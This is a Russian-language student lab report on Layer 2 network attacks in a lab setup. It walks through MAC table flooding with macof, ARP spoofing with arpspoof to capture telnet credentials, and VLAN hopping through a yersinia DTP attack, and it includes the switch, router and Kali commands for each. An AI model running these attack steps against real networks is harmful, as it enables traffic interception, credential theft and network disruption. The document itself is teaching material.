# **Практическая работа №2 Networks basic** # L2. Основные атаки на L2 --- ### Задание: 1) Провести атаки на канальном уровне модели OSI (L2) 2) Для формирования отчета - необходимо: - Провести атаку и в отчете отразить команды, необходимы для выполнения данной атаки - Приложить скриншот выполнения атаки, при возможности - результат атаки ## Часть 1. Переполнение таблицы коммутации #### 1.1 Установим на kali linux необходимую утилиту ```sh apt update apt install dsniff -y ``` #### 1.2 Включим атаку и через несколько секунд остановим её с помощью ctrl+c ```sh macof ``` ![](https://i.imgur.com/rnGniKp.png) #### 1.3 Увидим, что таблица коммутации switch7 переполнена ![](https://i.imgur.com/g0aOdKy.png) При этом другие устройства будут испытывать проблемы с сетью -- это можно проверить, запустив во время атаки обычный пинг. --- ## Часть 2. Arp-Spoofing #### 2.1 Проверим, может ли win7 подключаться по telnet к switch7 ``` telnet 192.168.1.100 ``` ![](https://i.imgur.com/rmeNCOK.png) #### 2.1 Настроим kali для атаки. Изменим параметры маршрутизации ``` nano /etc/sysctf.conf ``` ![](https://i.imgur.com/7AmNSCL.png) Нужно раскомментировать строку и сохранить файл #### 2.1 Применим изменения ``` sysctl -p /etc/sysctl.conf ``` ![](https://i.imgur.com/IiE2F00.png) #### 2.1 Начнём атаку ![](https://i.imgur.com/moc5DrA.png) ``` arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.100 ``` --- где 50 -- адрес win7, 100 -- адрес switch7, eth0 -- сетевой интерфейс kali --- :::info Включите Wireshark на kali, после чего зайдите с win7 по telnet на switch7 **Задача**: Найдите Telnet трафик. Обнаружте в трафике аутентификационные данные пользователя. ::: ![](https://i.imgur.com/Las2k0z.png) ## Часть 3. VLAN hopping #### 3.1 Поместим win10 в vlan10 --- ![](https://i.imgur.com/7LW2UcW.png) --- ``` Switch7(config)#int e1/2 ``` --- ``` Switch7(config-if)#switchport mode access ``` --- ``` Switch7(config-if)#switchport access vlan 10 ``` --- где е1/2 -- интерфейс, подключенный к win10 --- #### 3.2 Сконфигурируем trunk port на switch7 --- ![](https://i.imgur.com/hCBFsLd.png) --- ``` Switch7(config)#int e0/0 ``` --- ``` Switch7(config-if)#switchport trunk encapsulation dot1q ``` --- ``` Switch7(config-if)#switchport mode trunk ``` --- где е0/0 -- интерфейс, подключенный к switch9 --- :::info **Задача**: Настроить на switch9 интерфейсы е0/0, e0/1, e0/2 в trunk. ::: ![](https://i.imgur.com/WuRXuiP.png) #### 3.3 Настроим на роутере шлюз для vlan 10 --- ![](https://i.imgur.com/60BGt83.png) --- ``` Router(config)#int e0/1.10 ``` --- ``` Router(config-subif)#encapsulation dot1q 10 ``` --- ``` Router(config-subif)#ip address 192.168.10.1 255.255.255.0 ``` --- :::info После этих настроек Kali и Win10 будут доступны по сети, но трафик между ними будет проходить через маршрутизацию роутером. Используем атаку VLAN hopping, чтобы получить доступ в рамках широковещательного домена из Kali до win10. ::: #### 3.4 Установим yersinia --- ``` apt install yersinia -y ``` --- #### 3.5 Запустим yersinia --- ![](https://i.imgur.com/juJsKuV.png) --- ``` yersinia -G ``` --- #### 3.6 Проведем атаку на протокол DTP ![](https://i.imgur.com/vXfocKA.png) #### 3.7 Подготовим интерфейсы Kali ![](https://i.imgur.com/4dJESLN.png) ``` root@kali:# modprobe 8021q root@kali:# vconfig add eth0 10 root@kali:# ifconfig eth0.10 up ``` где 10 -- vlan id <aside> 💡 Далее можно выдать ip адрес на интерфейс eth0.10 из сети win10 и попробовать сгенерировать трафик к win10. **Задача**: С помощью Wireshark проанализируйте исходящий трафик от Kali и найдите трафик с vlan id 10. </aside> ![](https://i.imgur.com/BaRUXiI.png)